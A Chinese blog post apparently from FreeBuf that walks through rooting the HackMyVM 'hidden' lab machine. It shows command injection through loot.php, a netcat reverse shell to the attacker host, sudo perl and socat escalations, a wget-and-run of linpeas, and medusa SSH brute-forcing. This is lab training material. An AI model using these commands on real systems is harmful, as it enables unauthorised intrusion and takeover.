freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-hidden
2022-04-08 06:44:05
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机地址:192.168.1.128

靶机地址:192.168.1.5

目标:root.txt和user.txt

nmap -A -p- 192.168.1.5

1649371017_624f678901fae7bf1fa26.png!small?1649371018066

开启了22端口和80端口!!访问下80端口!!

http://192.168.1.5/

1649371030_624f6796bb63c31ec28f5.png!small?1649371031755

漏洞利用阶段

再查看一下源代码:

1649371036_624f679c1668868e2b2b0.png!small?1649371037109

这是一个格式,像是一个域名!!

上面那个图是猪圈密码的变种!

这里感谢:这位同学的技术支持!

1649371045_624f67a5831beda12dd66.png!small?1649371046526

密码表在下面!

1649371053_624f67adcde8aef2d1840.png!small?1649371054818

根据密码表破解密码!!!

得出:SYSHIDDENHMV

根据源代码的格式修改密码:得出->sys.hidden.hmv

这里我们修改下kali的/etc/hosts下的文件:

1649371061_624f67b5a8d3c8ce54905.png!small?1649371062737

访问下:我们看到第二关:

http://sys.hidden.hmv/

1649371094_624f67d69d2b75ec58021.png!small?1649371095658

接着,我们坐下这个域名下的目录扫描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/ -x txt,php,html,log,zip

1649371110_624f67e61d0041811d8be.png!small?1649371111156

第一个地址:

http://sys.hidden.hmv/users/

1649371134_624f67fede001691300ad.png!small?1649371135917

1649371141_624f680563862609dc2fc.png!small?1649371142427

$ sudo apt-get install windows10 -y

好像没啥用!

第二个地址:

http://sys.hidden.hmv/members/

1649371150_624f680e12e2afa3c90a0.png!small?1649371151079

http://sys.hidden.hmv/members/7573185_0.webp

1649371155_624f68138275c13268d90.png!small?1649371156527

第三个地址:状态码是301,重定向,并且是白屏,下面应该还有东西!

接着下一重目录扫描!

http://sys.hidden.hmv/weapon/

1649371162_624f681a0930b5114d036.png!small?1649371163044

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/weapon/ -x txt,php,html,log,zip

1649371185_624f6831ec8569191b3c8.png!small?1649371187001

访问:这个地址,又是白屏!根据loot和tool推断有命令执行漏洞,我们FUZZ一下参数!

http://sys.hidden.hmv/weapon/loot.php

这里我们采用WFUZZ:

wfuzz -t 500 -c --hh=0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://sys.hidden.hmv/weapon/loot.php?FUZZ=id

我们这个wfuzz参数的意义:

-t N: Specify the number of concurrent connections (10 default)

指定并行链接的数量:

-c: Output with colors

输出信息带有颜色

--hh N[,N]+: Hide responses with the specified chars (Use BBB for taking values from baseline)

隐藏指定字符的响应信息

-w:指定字典

1649371201_624f6841ae0d35c867d72.png!small?1649371202826

访问链接:http://sys.hidden.hmv/weapon/loot.php?hack=id

1649371208_624f6848a0cd5e7ceb346.png!small?1649371209659

当前用户是www-data!

这里我们在命令执行中加入反弹bash的命令!并在kali上进行监听!

http://sys.hidden.hmv/weapon/loot.php?hack=nc 192.168.1.128 4444 -e /bin/bash

nc -lvvp 4444

-c shell commands:as `-e'; use /bin/sh to exec [dangerous!!]

-e filename      :program to exec after connect [dangerous!!]

程序连接后执行命令

1649371216_624f68502ee3565329603.png!small?1649371217157

这里反弹后的shell很多命令都不回显,所以我们搞个python的shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'

1649371221_624f6855e898d11400050.png!small?1649371222980

1649371226_624f685a471fe51e993f3.png!small?1649371227323

权限提升阶段

我天,3重提权!!!

suid和sudo -l走起!!!

1649371231_624f685fb4b4887dc3891.png!small?1649371232833

运行下,看看/usr/bin/perl -h

1649371237_624f6865738106ad09023.png!small?1649371238519

这个命令可以直接反弹到文件所属用户toreto账户的shell!而且不用密码!当然也没有密码!

大佬的提权WP:

1649371243_624f686b0e0dce0b58be2.png!small?1649371244085

翻一下:

如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!

sudo -u toreto /usr/bin/perl -e 'exec "/bin/sh";'

1649371248_624f68708924f36861a09.png!small?1649371249560

还有两个账户:

1649371258_624f687a10103e4dd2750.png!small?1649371259125

这里直接上传linpeas.sh文件!看看扫描下!

1649371312_624f68b0847e5ee438e34.png!small?1649371313539

cd /tmp

wget http://192.168.1.128:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

这个东西有点意思,看看文件!

1649371317_624f68b5c93baf3347bea.png!small?1649371318831

这是atenea账户的密码表吗?下载下来看看!

1649371322_624f68badd3db52d6eae4.png!small?1649371323973

1649371328_624f68c0afab965ddd92a.png!small?1649371329786

1649371333_624f68c5ef72b3ccf081c.png!small?1649371334993

这里我们采用medusa进行暴力破解下!

medusa -h 192.168.1.5 -u atenea -P atenea.txt -M ssh -f -t 10 -O hidden.txt

破解成功:

User: atenea Password: sys8423hmv

1649371339_624f68cbb2dfe7eb1702b.png!small?1649371340793

SSH登录成功:

1649371344_624f68d05140e57de3a2e.png!small?1649371345391

第一个flag:

cat user.txt

hmv{c4Hq**************pTL}

接下来,就需要提权到root了!

查一下sudo -l权限!!!

1649371359_624f68dfd16e3167d1786.png!small?1649371360850

大佬的提权WP:

1649371365_624f68e51f11c1886c461.png!small?1649371366137

翻一下:如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!

我们先看下,这个命令有啥功能!

1649371371_624f68eb930dadb8c96ee.png!small?1649371372702

sudo -u root /usr/bin/socat stdin exec:/bin/sh

1649371379_624f68f35ac0fefd49f3f.png!small?1649371380373

root的flag!!

hmv{2M*****************B6}

# 渗透测试 # 网络安全 # web安全 # CTF # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录